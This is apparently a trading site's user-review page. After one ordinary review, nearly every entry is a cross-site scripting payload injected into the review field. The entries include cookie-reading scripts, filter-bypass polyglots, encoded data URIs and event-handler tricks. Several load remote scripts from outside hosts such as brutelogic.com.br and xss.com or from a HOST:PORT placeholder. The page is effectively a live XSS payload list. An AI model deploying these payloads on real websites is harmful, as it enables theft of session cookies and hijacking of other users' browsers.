ianrandmckenzie's Reviews

Overall Rating


REVIEW

Great trade, everything went well

REVIEW

1<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>

REVIEW

1<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #

REVIEW

1<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";document.getElementById("safe123").click=function()+{alert(Safe.get());};document.getElementById("safe123").click(test);'><source>#

REVIEW

1<script for=document event=onreadystatechange>getElementById('safe123').click()</script>

REVIEW

1<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>

REVIEW

1<iframe src="404" onload="frames[0].document.write(&quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>&quot;)"></iframe>

REVIEW

1<iframe src="404" onload="content.frames[0].document.write(&quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>&quot;)"></iframe>

REVIEW

1<iframe src="404" onload="self.frames[0].document.write(&quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>&quot;)"></iframe>

REVIEW

1<iframe src="404" onload="top.frames[0].document.write(&quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>&quot;)"></iframe>

REVIEW

1<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

REVIEW

1<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

REVIEW

1<textarea id=ta onfocus="write('<script>alert(1)</script>')" autofocus></textarea>

REVIEW

1<script>alert('XSS')</script>

REVIEW

1

REVIEW

1'"--></style></script><script>shadowlabs(0x000045)</script>

REVIEW

1<<scr\0ipt/src=http://xss.com/xss.js></script

REVIEW

1'"--></style></script><script>RWAR(0x00010E)</script>

REVIEW

1

REVIEW

1' onmouseover=alert(/Black.Spook/)

REVIEW

1'<script>window.onload=function(){document.forms[0].message.value='1';}</script>

REVIEW

1x</title><img src=x onerror=alert(1)>

REVIEW

1<script> document.getElementById("safe123").setCapture(); document.getElementById("safe123").click(); </script>

REVIEW

1<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>

REVIEW

1<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

REVIEW

1<script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

REVIEW

1<script>alert(document.documentElement.innerHTML.match(/'([^']+)/)[1])</script>

REVIEW

1<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']+)/)[1])</script>

REVIEW

1<script> d = document.createElement("div"); d.appendChild(document.head.cloneNode(true)); alert(d.innerHTML.match("cookie = '(.*?)'")[1]); </script>

REVIEW

1<script>alert(document.head.innerHTML.substr(146,20));</script>

REVIEW

1<script>alert(document.head.childNodes[3].text)</script>

REVIEW

1<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>

REVIEW

1<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>

REVIEW

1<script> document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click({'type':'click','isTrusted':true}); </script>

REVIEW

1<x onxxx=1

REVIEW

1<x/onxxx=1

REVIEW

1<x 1='1'onxxx=1

REVIEW

1<x 1="1"onxxx=1

REVIEW

1<script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

REVIEW

1

REVIEW

1<scr<script>ipt>alert('XSS')</scr<script>ipt>

REVIEW

1"><script>alert('XSS')</script>

REVIEW

1<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>

REVIEW

1<body onload=alert(/XSS/.source)>

REVIEW

1<input autofocus onfocus=alert(1)>

REVIEW

1<video/poster/onerror=alert(1)>

REVIEW

1<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

REVIEW

1';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

REVIEW

1javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a

REVIEW

1javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/

REVIEW

1javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*

REVIEW

1"><script>alert(String.fromCharCode(88,83,83))</script>

REVIEW

1<img src=x onerror=alert(String.fromCharCode(88,83,83));>

REVIEW

1<img src=x:alert(alt) onerror=eval(src) alt=xss>

REVIEW

1"><img src=x onerror=alert('XSS');>

REVIEW

1"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

REVIEW

1<svg/onload=alert('XSS')>

REVIEW

1<svg/onload=alert(String.fromCharCode(88,83,83))>

REVIEW

1"><svg/onload=alert(String.fromCharCode(88,83,83))>

REVIEW

1<video src=_ onloadstart="alert(1)">

REVIEW

1<marquee onstart=alert(1)>

REVIEW

1data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+

REVIEW

1" onclick=alert(1)//<button  onclick=alert(1)//> */ alert(1)//

REVIEW

1javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*

REVIEW

1<img src=x onerror=alert('XSS');>

REVIEW

1<svg onload=alert(1)>

REVIEW

1<svg id=alert(1) onload=eval(id)>

REVIEW

1"><svg/onload=alert(/XSS/)

REVIEW

1<select autofocus onfocus=alert(1)>

REVIEW

1<textarea autofocus onfocus=alert(1)>

REVIEW

1<keygen autofocus onfocus=alert(1)>

REVIEW

1<video><source onerror="javascript:alert(1)">

REVIEW

1<details/open/ontoggle="alert`1`">

REVIEW

1<audio src onloadstart=alert(1)>

REVIEW

1<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>

REVIEW

1data:text/html,<script>alert(0)</script>

REVIEW

1jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )// //</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

REVIEW

1javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

REVIEW

1<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";getElementById("safe123").click=function()+{alert(Safe.get());};getElementById("safe123").click(test);</SCRIPT>#

REVIEW

1javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//

REVIEW

1javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*

REVIEW

1--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

REVIEW

1/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

REVIEW

1javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

REVIEW

1/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

REVIEW

1<object onafterscriptexecute=confirm(0)>

REVIEW

1<object onbeforescriptexecute=confirm(0)>

REVIEW

1<script>window['alert'](document['domain'])<script>

REVIEW

1<img src='1' onerror/=alert(0) />

REVIEW

1<script>window['alert'](0)</script>

REVIEW

1<script>parent['alert'](1)</script>

REVIEW

1<script>self['alert'](2)</script>

REVIEW

1<script>top['alert'](3)</script>

REVIEW

1"><svg onload=alert(1)//

REVIEW

1"onmouseover=alert(1)//

REVIEW

1"autofocus/onfocus=alert(1)//

REVIEW

1'-alert(1)-'

REVIEW

1'-alert(1)//

REVIEW

1\'-alert(1)//

REVIEW

1</script><svg onload=alert(1)>

REVIEW

1<x contenteditable onblur=alert(1)>lose focus!

REVIEW

1<x onclick=alert(1)>click this!

REVIEW

1<x oncopy=alert(1)>copy this!

REVIEW

1<x oncontextmenu=alert(1)>right click this!

REVIEW

1<x oncut=alert(1)>cut this!

REVIEW

1<x ondblclick=alert(1)>double click this!

REVIEW

1<x ondrag=alert(1)>drag this!

REVIEW

1<x contenteditable onfocus=alert(1)>focus this!

REVIEW

1<x contenteditable oninput=alert(1)>input here!

REVIEW

1<x contenteditable onkeydown=alert(1)>press any key!

REVIEW

1<x contenteditable onkeypress=alert(1)>press any key!

REVIEW

1<x contenteditable onkeyup=alert(1)>press any key!

REVIEW

1<x onmousedown=alert(1)>click this!

REVIEW

1<x onmousemove=alert(1)>hover this!

REVIEW

1<x onmouseout=alert(1)>hover this!

REVIEW

1<x onmouseover=alert(1)>hover this!

REVIEW

1<x onmouseup=alert(1)>click this!

REVIEW

1<x contenteditable onpaste=alert(1)>paste here!

REVIEW

1<script>alert(1)//

REVIEW

1<script>alert(1)<!

REVIEW

1<script src=//brutelogic.com.br/1.js>

REVIEW

1<script src=//3334957647/1>

REVIEW

1<x onxxx=alert(1)

REVIEW

1<x onxxx=1

REVIEW

1<x onxxx=1

REVIEW

1<x onxxx=1

REVIEW

1<x onxxx=1

REVIEW

1<x onxxx=1

REVIEW

1<X onxxx=1

REVIEW

1<x OnXxx=1

REVIEW

1<X OnXxx=1

REVIEW

1<x onxxx=1 onxxx=1

REVIEW

1<x/onxxx=1

REVIEW

1<x onxxx=1

REVIEW

1<x onxxx=1

REVIEW

1<x onxxx=1

REVIEW

1<x </onxxx=1

REVIEW

1<http://onxxx=1/

REVIEW

1<x onxxx=alert(1) 1='

REVIEW

1<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

REVIEW

1'onload=alert(1)><svg/1='

REVIEW

1'>alert(1)</script><script/1='

REVIEW

1*/alert(1)</script><script>/*

REVIEW

1<form action=javascript:alert(1)><input type=submit>

REVIEW

1<form><button formaction=javascript:alert(1)>click

REVIEW

1<form><input formaction=javascript:alert(1) type=image value=click>

REVIEW

1<x 1=">" onxxx=1

REVIEW

1*/</script>'>alert(1)/*<script/1='

REVIEW

1<script>alert(1)</script>

REVIEW

1<script src=javascript:alert(1)>

REVIEW

1<iframe src=javascript:alert(1)>

REVIEW

1<embed src=javascript:alert(1)>

REVIEW

1<math><brute href=javascript:alert(1)>click

REVIEW

1<form><input formaction=javascript:alert(1) type=submit value=click>

REVIEW

1<form><input formaction=javascript:alert(1) type=image src=SOURCE>

REVIEW

1*/alert(1)">'onload="/*<svg/1='

REVIEW

1`-alert(1)">'onload="`<svg/1='

REVIEW

1<a href=javascript:alert(1)>click

REVIEW

1<isindex action=javascript:alert(1) type=submit value=click>

REVIEW

1<isindex formaction=javascript:alert(1) type=submit value=click>

REVIEW

1<object data=javascript:alert(1)>

REVIEW

1<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>

REVIEW

1<svg><script xlink:href=data:,alert(1) />

REVIEW

1<math><brute xlink:href=javascript:alert(1)>click

REVIEW

1<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

REVIEW

1<html ontouchstart=alert(1)>

REVIEW

1<html ontouchend=alert(1)>

REVIEW

1<html ontouchmove=alert(1)>

REVIEW

1<html ontouchcancel=alert(1)>

REVIEW

1<body onorientationchange=alert(1)>

REVIEW

1"><img src=1 onerror=alert(1)>.gif

REVIEW

1<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

REVIEW

1GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

REVIEW

1<script src="data:&comma;alert(1)//

REVIEW

1"><script src=data:&comma;alert(1)//

REVIEW

1<script src="//brutelogic.com.br&sol;1.js&num;

REVIEW

1"><script src=//brutelogic.com.br&sol;1.js&num;

REVIEW

1<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;

REVIEW

1"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;

REVIEW

1<base href=//0>

REVIEW

1<script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)

REVIEW

1<body onload=alert(1)>

REVIEW

1<body onpageshow=alert(1)>

REVIEW

1<body onfocus=alert(1)>

REVIEW

1<body onhashchange=alert(1)><a href=#x>click this!#x

REVIEW

1<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

REVIEW

1<body onscroll=alert(1)><br><br><br><br>

REVIEW

1<body onresize=alert(1)>press F12!

REVIEW

1<body onhelp=alert(1)>press F1! (MSIE)

REVIEW

1<marquee onstart=alert(1)>

REVIEW

1<marquee loop=1 width=0 onfinish=alert(1)>

REVIEW

1<audio src onloadstart=alert(1)>

REVIEW

1<video onloadstart=alert(1)><source>

REVIEW

1<input autofocus onblur=alert(1)>

REVIEW

1<keygen autofocus onfocus=alert(1)>

REVIEW

1<form onsubmit=alert(1)><input type=submit>

REVIEW

1<select onchange=alert(1)><option>1<option>2

REVIEW

1<menu id=x contextmenu=x onshow=alert(1)>right click me!

REVIEW

1<script>\u0061\u006C\u0065\u0072\u0074(1)</script>

REVIEW

1<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />

REVIEW

1<iframe src="javascript:alert(1)"></iframe>

REVIEW

1<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>

REVIEW

1<script>$=1,alert($)</script>

REVIEW

1<script ~~~>confirm(1)</script ~~~>

REVIEW

1<script>$=1,\u0061lert($)</script>

REVIEW

1<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>

REVIEW

1<</script/script><script ~~~>\u0061lert(1)</script ~~~>

REVIEW

1</style></scRipt><scRipt>alert(1)</scRipt>

REVIEW

1<img/id="alert&lpar;&#x27;XSS&#x27;&#x29;\"/alt=\"/\"src=\"/\"onerror=eval(id&#x29;>

REVIEW

1<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>

REVIEW

1<svg><x><script>alert&#40;&#39;1&#39;&#41</x>

REVIEW

1<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>